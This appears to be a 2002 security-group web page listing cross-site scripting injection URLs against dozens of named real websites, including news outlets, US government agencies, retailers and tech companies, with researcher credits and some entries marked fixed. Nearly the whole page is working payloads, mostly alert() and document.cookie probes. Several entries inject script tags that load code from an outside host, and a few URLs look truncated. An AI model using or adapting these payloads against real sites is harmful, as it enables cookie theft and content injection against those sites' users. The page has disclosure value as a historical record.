The CSS Blacklist...
Last Updated: November 16, 2002

News Media | Government Agencies | Online Stores | Search Engines | Technology | Misc

   

Disclaimer:
The links below are provided "AS IS" and may be used only for legitimate security analysis purposes. Point Blank
Security does not in any way shape or form condone the unauthorized access of systems or priviledged information, and
specifically prohibits the use or reproduction of this information for such purposes. In no event shall Point Blank Security be liable
for any damages whatsoever arising out of or in connection with the use or dissemination of this information. Any use of this
information is at the user's own risk.

     

News Media - TOP

LA Times
01) Subversion of Information Vulnerability
http://latimes.com/search/lat_all.jsp?Query=</script>
Credit: Jeremiah Jacks

OC Register
01) http://www.ocregister.com/cgi-bin/htdig/htsearch2?words=">><script>alert%28'test'%29%3B</script>
Credit: Jeremiah Jacks - FIXED

NY Times
01) Subversion of Information Vulnerability
http://www.nytimes.com/corrections.html?pagewanted=">><script>document.writeln('('src=http://pointblanksecurity.com/css/nytimes.js><\/script>');</script> Credit: Jeremiah Jacks
02) http://www.nytimes.com/auth/login?URI=">><script>alert('nytimes')</script>
Credit: Dmitry Golubev - FIXED
03) http://realestate.nytimes.com/rentals/SearchZipWId.asp?p=">><script>alert('test');</script>
Credit: Jeremiah Jacks
04) http://realestate.nytimes.com/rentals/search.asp?ros=r&ST=NY&CN=">><script>alert('test');</script>&p=C
Credit: Jeremiah Jacks - FIXED

The Washington Post
01) Subversion of Information Vulnerability
http://www.washingtonpost.com/ac3/ContentServer?pagename=world/worldsearch&COUNTRY=.com/css/washpost.js></script>
Credit: Jeremiah Jacks
02) Subversion of Information Vulnerability
http://www.washingtonpost.com/ac3/ContentServer?pagename=weather&zipcode=post.js></script>
Credit: Jeremiah Jacks
03) http://mp3.washingtonpost.com/browse/index.shtml?band_name=><script>alert('test');</script>&genre_id=100&hometown_id=100
Credit: Jeremiah Jacks - FIXED
04) http://eg.washingtonpost.com/search?cslink=cs_keyword_home&type=bridge&query=%3Cscript%3Ealert%28%27test%27
%29%3B%3C%2Fscript%3E
Credit: Jeremiah Jacks

Newsbytes
01) Subversion of Information Vulnerability
http://www.newsbytes.com/cgi-bin/udt/mlm.user.register?client.id=newsbytes&email.address=">><script>function+Chr(code)
{return+String.fromCharCode(code);}document.writeln('('http://pointblanksecurity.com/css/newsbytes.js><\/script>');</script> Credit: Jeremiah Jacks
02) Subversion of Information Vulnerability
http://www.newsbytes.com/cgi-bin/udt/mlm.user.view?client.id=newsbytes&user.email=-->><script>function+Chr(code)
{return+String.fromCharCode(code);}document.writeln('('http://pointblanksecurity.com/css/newsbytes.js><\/script>');</script> Credit: Jeremiah Jacks

Newsday
01) http://www.newsday.com/search/ny_all.jsp?Query=-%3E%3Cscript%3Ealert%28%27test%27%29%3B%3C%2Fscript
%3E%3C%21--
Credit: Gary Jones - FIXED

American Stock Exchange
01) http://search.amex.com/a/search_results.asp?query=-->><script>alert('test');</script>

Credit: Jeremiah Jacks - FIXED

NYSE
01) http://www.nyse.com/s97is.vts?Action=FilterSearch&Filter=">><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED

Discovery Channel
01) http://dsc.discovery.com/search/results.jsp?channel=DSC&srchtxt=nss">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev

People Magazine
01) http://people.aol.com/people/search/results/1,11400,,00.html?query=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED

CBS MarketWatch
01) http://cbs.marketwatch.com/tools/quotes/basic.asp?symb=">><script>alert('test');</script>
Credit: Jeremiah Jacks

TIME Magazine
01) http://www.time.com/time/searchresults?summaries=yes&search_type=simple&query=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED

WorldNews
01) http://www.worldnews.com/?template=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED

BBC
01) http://www.bbc.co.uk/cgi-perl/h2/h2.cgi?x=">><script>alert("beep!")</script>&state=password&board=mc
Credit: Dmitry Golubev - FIXED

The Register
01) http://www.theregister.co.uk/cgi-bin/dispatcher.cgi?url=nss><script>alert(document.location)</script>
Credit: Dmitry Golubev - FIXED

CNET
01) http://cnet.search.com/search?q=">><script>alert("cnet")</script><"
Credit: Dmitry Golubev - FIXED

CNN Money - LookSmart
01) http://cnnfn.looksmart.com/r_search?key=><script>alert('test');</script>
Credit: Jeremiah Jacks

CNN.com - LookSmart
01) http://cnn.looksmart.com/r_search?&izch&pin=">><script>alert('test');</script>
Credit:
Jeremiah Jacks - FIXED

BusinessWeek
01) http://search.businessweek.com/search97cgi/s97_cgi?action=FilterSearch&filter=><script>alert('test');</script>
Credit: Jeremiah Jacks

The Boston Globe
01) http://search.boston.com/globe.vts?Action=><script>alert('yee+haw');</script>
Credit: Esther Matut

ESPN
01) http://keyword.espn.go.com/keyword/espnlookup?qt=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Esther Matut - FIXED

Government Agencies - TOP

California, USA
01) http://www.ca.gov/state/portal/myca_search_results.jsp?sSearchString=%3Cscript%3E+alert%28%27hi%27%29%3B+
%3C%2Fscript%3E
Credit: Esther Matut

FirstGOV
01) http://www.firstgov.gov/fedsearch4/index.jsp?mt0=all&ms0=should&mw0=%3Cscript%3E+alert%28%27hi%27%29%3B+
%3C%2Fscript%3E&db=www&st=AS
Credit: Esther Matut
02) http://www.firstgov.gov/external/><script>alert('test');</script>
Credit: Jeremiah Jacks

US DoJ
01) http://www.ojp.usdoj.gov/search97cgi/s97_cgi?action=Action=FilterSearch&Filter=">><script>alert("dep%20of%20justice@!")
</script>
Credit: Gary Jones

US Federal Reserve
01) http://search.federalreserve.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("gimme%20some
%20money!%20please?%20:)")</script>
Credit: Gary Jones - FIXED

The White House
01) http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=/">><script>alert("white+house!")</script>
Credit:
Dmitry Golubev - FIXED

The FBI
01) http://www.fbi.gov/cgi-bin/outside.cgi?/">><script>alert("FBI")</script>
Credit:
Dmitry Golubev - FIXED

Department of Defense(DoD)
01) http://www.defenselink.mil/search97/s97is.vts?Action=FilterSearch&Filter=">><script>alert("defend")</script>
Credit: Dmitry Golubev

National Institutes of Health
01) http://search1.nci.nih.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

U.S. Census Bureau
01) http://www.census.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

U.S. House of Representatives
01) http://wwws.house.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

Centers for Disease Control
01) http://search.cdc.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

FFIEC
01) http://search.ffiec.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

FDIC
01) http://www.fdic.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

FedStats
01) http://www.fedstats.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED

Dept. of Education
01) http://www.ed.gov/search/searchResList.jsp?st=0&colParam=ED&lk=1&qt=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Esther Matut - FIXED

Online Stores - TOP

Office Max
01) http://www.officemax.com/max/solutions/product/thumbnail.jsp?expansionOID=>><script>alert('test');</script>
Credit: Jeremiah Jacks

JCPenney
01) http://www.jcpenney.com/jcp/Department.asp?DeptID=9452&CatID=9452&CatTyp=DEP&Dep=><script>alert('test');</script>
Credit: Jeremiah Jacks
02) http://www.jcpenney.com/jcp/Products.asp?DeptID=469&CatID=10542&CatTyp=DEP&ItemTyp=G&GrpTyp=SIZ&ItemID=040f564&
ProdSeq=6&OffSet=6&ProdCount=6&Cat=sweaters><script>alert('test');</script>&Dep=men%27s&PCat=casual+shirts&PCatID=10417417
Credit: Jeremiah Jacks
03) http://www.jcpenney.com/jcp/Products.asp?DeptID=469&CatID=10079&CatTyp=DEP&ItemTyp=G&GrpTyp=SIZ&ItemID=02ac129&
ProdSeq=2&OffSet=2&ProdCount=3&Cat=jean+jackets&Dep=men%27s&PCat=jeans&PCatID=3657&SearchString=><script>alert('test');</script>
Credit: Jeremiah Jacks

eCOST
01) http://www.ecost.com/ecost/search/powersearch.asp?search_string=">><script>alert('hi');</script>
Credit: Gary Jones

Banana Republic
01) http://www.bananarepublic.com/SubDepartment.asp?loc=">><script>alert('test');</script>
Credit: Jeremiah Jacks

Barnes & Noble
01) http://shop.barnesandnoble.com/booksearch/results.asp?WRD=%3Cscript%3Ealert%28document%2Ecookie%29%3B%3C
%2Fscript%3E
Credit: Gary Jones - FIXED
02) http://shop.barnesandnoble.com/shop/cart.asp?vcqty=">><script>alert('test');</script>A+href="
Credit: Jeremiah Jacks

Office Depot
01) http://www.officedepot.com/shop/search/noresults.asp?searchquery=%3Cscript%3E+alert%28%27hi%27%29%3B+
%3C%2Fscript%3E
Credit: Gary Jones

Sears
01) http://www.sears.com/sr/mercado/searchall.jsp?keyword=><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED

BlueLight (K-Mart)
01) http://www.bluelight.com/searchHandler/index.jsp?keywords=><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks

McDonald's
01) http://www.mcdonalds.com/cgi-bin/search/search.pl?terms=><script>alert('hi')</script>
Credit: Dmitry Golubev

Philip Morris Home
01) http://www.philipmorris.com/search/search_results.asp?criteria=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev

WalMart
01) http://www.walmart.com/catalog/search.gsp?search_constraint=0&search_query=%3Cscript%3E+alert%28%27hi%27%29
%3B+%3C%2Fscript%3E
Credit: Esther Matut

Best Buy
01) http://www.bestbuy.com/Accessories/Acc_list.asp?m=">><script>alert('test');</script>
Credit: Jeremiah Jacks

CompUSA - https://www.compusa.com/shop/xt_account_logon.asp?xt_action=lookup&frm_email='&frm_password='
01) https://www.compusa.com/shop/account_logon.asp?errors=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev

Search Engines - TOP

Rpmfind.net
01) http://www.rpmfind.net/linux/rpm2html/search.php?query=nss">><script>alert(document.location)</script>
Credit: Dmitry Golubev

Alta Vista
01 http://altavista.com/sites/search/web?q=><script>alert('bleh');</script>
Credit: Jeremiah Jacks - FIXED

Google
01) http://www.google.com/search?q=pointblanksecurity.com/">><script>alert(document.cookie)</script>
Credit: Jeremiah Jacks - FIXED

Hot Wired
01) http://search.hotwired.com/search97/s97is.vts?Action=FilterSearch&Filter=">><script>alert("wired!")</script>
Credit: Dmitry Golubev - FIXED

Netscape
01) http://mpsearch.netscape.com/BizSearch?keyword=><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks

AOL
01) http://search.hometown.aol.com/find.adp?query=">><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks

 Technology - TOP

CyberArmy
01) http://www.cyberarmy.com/search/search.cgi?query=><script>alert("Test")</script>
Credit: Joerg Niebauer - FIXED

Red Hat
01) http://www.redhat.com/apps/search/results.html?search:query_cb=nss">><script>alert("redhat")</script><"
Credit: Dmitry Golubev - FIXED

Microsoft
01) http://msevents.microsoft.com/isapi/events/usa/enu/search_results.asp?KW=''>><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED
02) http://www.microsoft.com/usa/js/sendfriend.asp?sAddress=">><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED
03) (Netscape Only) http://search.microsoft.com/us/shop/SearchMS25.asp?qu=";alert
('test');//&so=RECCNT&boolean=ALL&intCat=0&nq=NEW&p=1
Credit: Jeremiah Jacks

WHOIS.net
01) http://whois.net/whois.cgi2?d=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Gary Jones - FIXED
01) http://www.whois.net/checkDomain.cgi2?domain=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2F
script%3E&tld=com
Credit: Esther Matut - FIXED

Yellow Pages
01) http://www.yellowpages.com/yellowpages/scripts/search.dll?ep=0&query=><script>+alert('hi')+</script>&qstate=AL
Credit: Gary Jones - FIXED

IEEE
01) http://ieeexplore.ieee.org/search97/s97is.vts?Action=FilterSearch&Filter=">><script>alert('document.cookie')</script>
Credit: Jeremiah Jacks - FIXED

Electronic Frontier Foundation(EFF)
01) http://www.eff.org/cgi-bin/htsearch?exclude=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev

Chaos Computer Club(Germany)
01) http://www.ccc.de/cgi-bin/feedback.pl?page=><script>alert("ccc")</script>
Credit: Dmitry Golubev

IBM
01) http://commerce.www.ibm.com/cgi-bin/ncommerce/AdvantageCode?shoprfnbr=1&cntry=840&lang=en_US&
cntrfnbr=1&q=">><script>alert("ibm")</script>
Credit: Dmitry Golubev - FIXED

SourceForge
01) http://sourceforge.net/search/?words=">><script>alert(document.location)</script>
Credit: Dmitry Golubev

PHP.net
01) http://www.php.net/cal.php?a=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED

Adobe
01) http://www.adobe.de/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones

Apple
01) http://search03.apple.com/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("me%20likes%20red%20apples")
</script>
Credit: Gary Jones

Snort.org Discussion
01) http://snort.rapidnet.com/forum.asp?forum_id=3&forum_title=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED

Nokia (1st is Netscape only)
01) http://www.nokia.com/flashd/flash_redir.html?flash=">><script>alert("test")</script><"
Credit: Dmitry Golubev
01) http://www.nokia.com/find/forum/search.jsp?qt=nrw&la=">><script>alert("test")</script>
Credit: Dmitry Golubev

Cisco
01) http://www.cisco.com/><script>alert("test")</script>
Credit: Dmitry Golubev

FreeBSD
01) http://www.freebsd.org/><script>alert("test")</script>
Credit: Dmitry Golubev - FIXED

Gibson Research Center
01) https://grc.com/x/news.exe?cmd=xover&group=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED

Hewlett-Packard
01) http://productfinder.support.hp.com/tps/ProductFinder?h_query=%3E%3Cscript%3Ealert%28%27test%27%29%3B%3C
%2Fscript%3E%3C%21
Credit: Gary Jones - FIXED

DSL Reports
01) http://www.dslreports.com/information/kb/</title>><script>alert('test');</script><title>
Credit: Jeremiah Jacks

Verio
01) https://home.verio.com/lookup/index.cfm?sld=><script>alert('test');</script>
Credit: Gary Jones - FIXED

Oracle
01) http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=">><script>alert
('test');</script>&p_person_id=100&p_doc_location_array=Place+Holder&p_doc_location_array=document
&p_location_array=&p_keyword_array=&p_value_array=&p_date_begin=q_date&p_date_end=q_date
Credit: Jeremiah Jacks - FIXED
02) http://www.oracle.com/pls/ebn/search.simple?p_string=><script>alert(document.cookie);</script>
Credit: Esther Matut - FIXED

Miscellaneous - TOP

eTrade
01) Click Here...
Credit: Jeremiah Jacks - FIXED

Hollywood.com
01) http://www.hollywood.com/search_results.asp?keywords=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED
02) http://ads.hollywood.com/ads/popup.asp?con=><script>alert(document.cookie);</script>&TO=90000000
Credit: Jeremiah Jacks

RealNetworks
01) http://realguide.real.com/games/index.html?src=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED
02) http://realguide.real.com/search/?searchterm=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev
03) http://realguide.real.com/info/?page=search´┐Żion=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED
04) http://realguide.real.com/games/?s=">><script>alert('community')</script>
Credit: Jeremiah Jacks

PERL.com
01) CLICK HERE to log into perl.com...
Credit: Jeremiah Jacks

EXCITE
01) http://registration.excite.com/excitereg/login.jsp?return_url=">><script>alert("nice")</script>
Credit: Dmitry Golubev - FIXED

Netidentity
01) http://www.netidentity.com/default.asp?d=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED

Datek
01) http://www.datek.com/popinframe.html?symb=%22%3E%3Cscript%3Ealert%28%27test%27%29%3B%3C%2F
script%3E&ref=http%3A%2F%2Fcustom.marketwatch.com%2Fcustom%2Fdatek-com%2Fpub%2Fpub-qcn.asp
Credit: Jeremiah Jacks - FIXED

AT&T
01) http://search.att.com/search?action=><script>%20alert('hi');%20</script>
Credit: Gary Jones - FIXED

Corel
01) http://www3.corel.com/cgi-bin/gx.cgi/AppLogic+FTContentServer?pagename=Corel%2FAdvancedSearch
%2FResults&assets=all&query=%3Cscript%3E+AND+alert%28%27hi%27%29%3B+AND+%3C%2Fscript%3E&plainText=
%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Gary Jones

Tower Records
01) http://towermusic.endeca.com/towermusic?n=0&att=All_Music+%3Cscript%3E+alert%28%27hi%27%29%3B++%3C%2Fscript
%3E&cs=%3Cscript%3E+alert%28%27hi%27%29%3B++%3C%2Fscript%3E&csn=3&csr=1&dym=1
Credit: Esther Matut

MapQuest
01) http://mapquest.com/directions/main.adp?1a=">><script>alert('test');</script>
Credit: Jeremiah Jacks